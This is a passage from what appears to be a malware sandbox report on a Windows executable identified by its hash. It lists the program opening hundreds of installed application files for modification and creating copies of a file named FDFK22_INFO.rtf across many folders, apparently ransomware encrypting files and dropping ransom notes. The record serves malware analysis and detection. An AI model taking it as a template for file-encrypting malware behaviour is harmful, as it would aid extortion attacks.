Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\it.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\mr.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\EnableEnter.php a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\bin\server\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\83.0.4103.106.manifest a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Toronto a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ca.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\MoveImport.vbe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Graph.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification 